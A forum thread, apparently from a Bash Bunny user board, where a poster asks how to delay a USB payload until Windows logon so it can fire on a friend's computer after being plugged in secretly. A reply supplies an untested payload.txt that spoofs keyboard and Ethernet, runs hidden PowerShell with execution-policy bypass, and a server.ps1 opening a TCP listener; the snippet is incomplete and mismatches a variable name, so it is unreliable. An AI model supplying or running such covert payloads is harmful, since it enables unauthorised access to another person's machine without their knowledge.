EthanL Posted January 26, 2020 Share Posted January 26, 2020 Is there a way I could make for the payload only run after Windows logon happens? Quote Link to comment Share on other sites More sharing options...
kuyaya Posted January 26, 2020 Share Posted January 26, 2020 Hmm, you mean you want to brute force the login and then fire the payload? Or do you want to secretly plug in the bunny and wait for your friend to login and then fire the payload? Tbh, I dunno how to do that, but i'm sure that there is a way. Quote Link to comment Share on other sites More sharing options...
EthanL Posted January 26, 2020 Author Share Posted January 26, 2020 To plug it and wait for my friend to login to windows. Quote Link to comment Share on other sites More sharing options...
TheAge Posted March 16, 2020 Share Posted March 16, 2020 You could set attackmodes to HID and Ethernet and have a payload that opens something you can connect to. While you can't connect, you wait. Not tested code (payload.txt): LED SETUP ATTACKMODE HID STORAGE RNDIS_ETHERNET 0xF000/0xFF02 GET SWITCH_POSITION GET TARGET_IP # Wait till connection to socket server was possible (here it waits that the user logs in) while ! nc -G 2 -z $TARGET_IP 8337; do sleep 0.1 # Try to start socket server on client RUN WIN powershell -windowstyle hidden -ep bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\server.ps1')" done LED ATTACK # Looks like user is logged in, start your payload: ATTACKMODE HID LED FINISH server.ps: $ep = new-object System.Net.IPEndPoint ([system.net.ipaddress]::any, 8337) $listener = new-object System.Net.Sockets.TcpListener $endpoint $listener.start() $client = $listener.AcceptTcpClient() 1 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.